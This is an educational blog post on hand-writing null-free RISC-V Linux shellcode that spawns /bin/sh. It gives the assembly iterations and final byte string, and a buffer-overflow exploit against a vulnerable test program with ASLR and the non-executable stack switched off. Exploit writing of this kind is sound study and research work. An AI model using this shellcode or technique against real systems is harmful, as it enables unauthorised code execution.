Basic Shellcode in RISC-V Linux
In this post I’m going to summarise some relevant background about the RISC-V architecture and Linux syscalls, then show how shellcode can be written and assembled using the GNU toolchain. As you will see, the output machine code has some null bytes in it so I’ll point out where they’re coming from and iterate through a couple of versions to remove them. I’m just making this up as I go so look out for better techniques.
Real hardware is still difficult and expensive to obtain so I’ve been using a qemu virtual machine running the unfinished Debian RISC-V port. The setup process is moderately involved but fully documented on the Debian wiki. While RISC-V supports a number of configurations it appears that 64-bit little-endian (RV64) will be the standard one for general purpose computing.
For getting started with shellcoding here is the key background information:
- In the base standard, instructions are always 32 bits and must be 32-bit-aligned in memory.
- Some architectural features are optional extensions. One to be aware of is the Compressed “C” extension, which allows some instructions to shrink to 16 bits, mixed in with 32 bit ones. Instruction alignment is relaxed to 16-bit boundaries.
- qemu’s emulated CPU has the C extension and the assembler will produce a mixture of 16 and 32 bit instructions. I suspect that this support will be common in real CPUs for size and performance reasons.
- There are 32 integer registers, 64 bits in width, named
x0
throughx31
. The program counterpc
is separate and cannot be directly referenced. They are given alternative names likera
(return address),sp
(stack pointer) and so on, to encourage consistent usage. x0
(also calledzero
) always contains 0.- System calls are invoked using the
ecall
instruction, which has no parameters. The syscall number is taken from registera7
and the arguments froma0
,a1
,a2
, etc. - Each individual instruction is stored little-endian in memory.
objdump
displays them big-endian, which is how they are documented in the ISA manual, so be careful. - There are no stack-manipulating instructions like x86’s
call
,push
andpop
. Return addresses are stored in a “link register” of your choice. Pushes and pops are just loads and stores relative tosp
(ors0
, the frame pointer).
If in doubt refer to the User-Level ISA on the RISC-V website. It’s suprisingly readable and explains some of the design motivations too.
It’s relatively easy to install a riscv64 cross-compiler on Debian but it’s more interesting to run the full VM so I can test my code. I was able to install a native toolchain inside the VM with apt so that’s what I’m using. The list of extensions appears in cpuinfo
below (“c” for compressed).
root@riscv64:~# uname -a
Linux riscv64 4.15.0-00048-gfe92d7905c6e-dirty #1 SMP Wed Aug 22 18:43:55 AEST 2018 riscv64 GNU/Linux
root@riscv64:~# cat /proc/cpuinfo
hart : 0
isa : rv64imafdcsu
mmu : sv48
root@riscv64:~# gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/riscv64-linux-gnu/8/lto-wrapper
Target: riscv64-linux-gnu
...
Let’s go ahead and assemble some basic shellcode. It should launch /bin/sh
using the execve()
syscall. According to /usr/include/asm-generic/unistd.h
that’s syscall number 221. I’m going to be sloppy and set both the argv
and envp
arguments (a1
and a2
) to null. I just need a pointer to the path in a0
. I create execve.s
:
.global _start
.text
_start:
li s1, 0x68732f2f6e69622f # Load "/bin//sh" backwards into s1
sd s1, -16(sp) # Store dword s1 on the stack
sd zero, -8(sp) # Store dword zero after to terminate
addi a0,sp,-16 # a0 = filename = sp + (-16)
slt a1,zero,-1 # a1 = argv set to 0
slt a2,zero,-1 # a2 = envp set to 0
li a7, 221 # execve = 221
ecall # Do syscall
I’ve already done a couple of basic things to avoid nulls in the output. slt
(set if less than) is a tidy way to load zero into a register. (Edit Nov 2018: This isn’t the best choice when compressed instructions are available. You can simply write li a1,0
, which saves two bytes. It assembles to 16-bit C.LI
, which can load any 6 bit (signed) immediate into any register and have no nulls in the machine code.) I also place my data just below sp
instead of just above because small positive offsets tend to have lots of zeroes in them.
Assemble it into an executable:
$ gcc execve.s -c
$ ld execve.o -o execve
As hoped, this runs sh
:
tk@riscv64:~$ ./execve
$
Double-checking with strace
:
$ strace ./execve
execve("./execve", ["./execve"], 0x3ffffff6d0 /* 16 vars */) = 0
execve("/bin//sh", NULL, NULL) = 0
...
Now let’s have a look at how this is actually assembled.
$ objdump -d execve
...
0000000000010078 <_start>:
10078: 0343a4b7 lui s1,0x343a
1007c: 9794849b addiw s1,s1,-1671
10080: 00c49493 slli s1,s1,0xc
10084: 7b748493 addi s1,s1,1975
10088: 00c49493 slli s1,s1,0xc
1008c: 34b48493 addi s1,s1,843
10090: 00d49493 slli s1,s1,0xd
10094: 22f48493 addi s1,s1,559
10098: fe913823 sd s1,-16(sp)
1009c: fe013c23 sd zero,-8(sp)
100a0: ff010513 addi a0,sp,-16
100a4: fff02593 slti a1,zero,-1
100a8: fff02613 slti a2,zero,-1
100ac: 0dd00893 li a7,221
100b0: 00000073 ecall
That’s way more instructions than we ever typed. The reason is li
is one of several pseudo-instructions. Since it’s impossible to load an immediate 64-bit value with a 32-bit instruction it automatically splits it into a series of addi
and slli
(shift logical left) instructions.
We have quite a few null bytes in that auto-generated instruction sequence. In fact, slli
instructions by definition start with seven 0 bits followed by 5 bits of shift-amount. How annoying. There is a way out though: remember the compressed instructions? There is a compressed version (C.SLLI
in the ISA manual) which isn’t full of zeroes.
Let’s replace the li s1, 0x68732f2f6e69622f
in our source code with the auto-generated instructions in objdump
. New execve.s
:
.global _start
.text
_start:
lui s1,0x343a
addiw s1,s1,-1671
slli s1,s1,0xc
addi s1,s1,1975
slli s1,s1,0xc
addi s1,s1,843
slli s1,s1,0xd
addi s1,s1,559
sd s1, -16(sp) # Store it on the stack
sd zero, -8(sp) # Store a zero after to terminate
addi a0,sp,-16 # a0 = sp + (-16)
slt a1,zero,-1 # a1 set to 0 because 0 > -1
slt a2,zero,-1 # Ditto for a2
li a7, 221 # execve = 221
ecall # Do syscall
This is the disassembly after reassembling:
$ gcc execve.s -c; ld execve.o -o execve
$ objdump -d execve
...
0000000000010078 <_start>:
10078: 0343a4b7 lui s1,0x343a
1007c: 9794849b addiw s1,s1,-1671
10080: 04b2 slli s1,s1,0xc
10082: 7b748493 addi s1,s1,1975
10086: 04b2 slli s1,s1,0xc
10088: 34b48493 addi s1,s1,843
1008c: 04b6 slli s1,s1,0xd
1008e: 22f48493 addi s1,s1,559
10092: fe913823 sd s1,-16(sp)
10096: fe013c23 sd zero,-8(sp)
1009a: ff010513 addi a0,sp,-16
1009e: fff02593 slti a1,zero,-1
100a2: fff02613 slti a2,zero,-1
100a6: 0dd00893 li a7,221
100aa: 00000073 ecall
Now those nulls are gone. What happened? It seems that the li
pseudo-instruction will produce 32-bit slli
instructions even if the C extension is available. I guess this is a missing optimisation. If we include the slli
instructions directly in the source then it correctly optimises them down to the 16-bit format, which is both smaller and has no nulls.
I want to point out the second-last instruction li a7,221
. It’s interesting that objdump
has displayed this as the pseudo-instruction. In reality this is addi a7,zero,221
. Adding a value to the zero register is merely a convenient way to load a small immediate value to a register. For certain immediate values this will create a null byte in the shellcode (it’s okay here with 221 = 0x0dd). One possible solution is to null out a higher register like x31
(whose index is all 1s) and then do addi a7,x31,221
.
Finally we come to ecall
. This mnemonic only exists as a 32-bit instruction and must appear exactly as 0x00000073
. This was was easier to deal with in MIPS—the syscall
opcode has a numeric parameter so it’s common to see shellcode that fills it with a dummy value like 0x40404. In RISC-V we have no such luck. We have the usual sorts of workarounds—find a vulnerability where nulls are not a badchar, jump to an ecall
at a known address, encode the shellcode, or take advantage of the little-endian ordering and try to finish our buffer with 0x73, knowing that there will be three 0x00 chars after it.
For this example let’s assume we have an executable stack. We can generate an ecall
at -4(sp)
and jump to it. Replace the ecall
with the following:
# the 8 bytes below sp are already 0
addi a3,zero,0x73 # Assign 0x73 to a3
sb a3, -4(sp) # Store single byte at sp-4
addi a3,sp,-2 # a3 = sp - 2
jr -2(a3) # jump to a3 - 2
To avoid nulls, the jr
needs to have a small negative offset and I also need to use a higher register than sp
. Here I’ve chosen to use a3
. I need to get the stack pointer value into a3
, but again I need to use a small negative offset in the addi
to avoid nulls. I “share” the required offset of -4 across the two instructions so they both get a small negative.
This time it must be compiled with an executable stack. Otherwise the program will segfault on the jump.
$ gcc execve.s -c; ld execve.o -o execve -z execstack
The final disassembly with no nulls:
00000000000100b0 <_start>:
100b0: 0343a4b7 lui s1,0x343a
100b4: 9794849b addiw s1,s1,-1671
100b8: 04b2 slli s1,s1,0xc
100ba: 7b748493 addi s1,s1,1975
100be: 04b2 slli s1,s1,0xc
100c0: 34b48493 addi s1,s1,843
100c4: 04b6 slli s1,s1,0xd
100c6: 22f48493 addi s1,s1,559
100ca: fe913823 sd s1,-16(sp)
100ce: fe013c23 sd zero,-8(sp)
100d2: ff010513 addi a0,sp,-16
100d6: fff02593 slti a1,zero,-1
100da: fff02613 slti a2,zero,-1
100de: 0dd00893 li a7,221
100e2: 07300693 li a3,115
100e6: fed10e23 sb a3,-4(sp)
100ea: ffe10693 addi a3,sp,-2
100ee: ffe68067 jr -2(a3)
Let’s see the bytes in the order we actually need to provide them in our buffer.
$ objcopy -O binary --only-section=.text execve execve.text
$ od -t x1 execve.text
0000000 b7 a4 43 03 9b 84 94 97 b2 04 93 84 74 7b b2 04
0000020 93 84 b4 34 b6 04 93 84 f4 22 23 38 91 fe 23 3c
0000040 01 fe 13 05 01 ff 93 25 f0 ff 13 26 f0 ff 93 08
0000060 d0 0d 93 06 30 07 23 0e d1 fe 93 06 e1 ff 67 80
0000100 e6 ff
0000102
Notice that all of the instructions are in reverse order. To try it out, let’s set up an embarrassingly vulnerable test environment with a buffer overflow. First disable ASLR so our stack is predictable:
# echo 0 > /proc/sys/kernel/randomize_va_space
Now create a program vuln.c
:
We will need to compile this with an executable stack also.
$ gcc vuln.c -z execstack -o vuln
$ ./vuln hello
Location of buffer: 0x3ffffff4c0
Location of main: 0x2aaaaaa76a
Input len: 5
I won’t go into detail here but if you look at objdump -d vuln
you can work out that inside do_vuln()
the return address is stored at 152(sp)
and the buffer is at 16(sp)
.
[shellcode][AAAAA...padding to total len 136 bytes][ret address overwrite]
^ buffer
In practice the location of buffer
depends on the size of the arguments on the stack so it takes a bit of trial and error but it does work:
tk@riscv64:~$ ./vuln `python -c 'b = "\xb7\xa4\x43\x03\x9b\x84\x94\x97\xb2\x04\x93\x84\x74\x7b\xb2\x04\x93\x84\xb4\x34\xb6\x04\x93\x84\xf4\x22\x23\x38\x91\xfe\x23\x3c\x01\xfe\x13\x05\x01\xff\x93\x25\xf0\xff\x13\x26\xf0\xff\x93\x08\xd0\x0d\x93\x06\x30\x07\x23\x0e\xd1\xfe\x93\x06\xe1\xff\x67\x80\xe6\xff"; b += "A"*(136-len(b)); b += "\x40\xf4\xff\xff\x3f"; print b'`
Location of buffer: 0x3ffffff440
Location of main: 0x2aaaaaa76a
Input len: 141
$
Final execve.s
:
.global _start
.text
_start:
lui s1,0x343a # Load "/bin//sh" into s1
addiw s1,s1,-1671
slli s1,s1,0xc
addi s1,s1,1975
slli s1,s1,0xc
addi s1,s1,843
slli s1,s1,0xd
addi s1,s1,559
sd s1, -16(sp) # Store it on the stack
sd zero, -8(sp) # Store a zero after to terminate
addi a0,sp,-16 # a0 = sp + (-16)
slt a1,zero,-1 # a1 set to 0 because 0 > -1
slt a2,zero,-1 # Ditto for a2
li a7, 221 # execve = 221
addi a3,zero,0x73 # Create ecall instruction at -4(sp)
sb a3, -4(sp)
addi a3,sp,-2 # Dodge nulls in instructions
jr -2(a3) # Jump to -4(sp)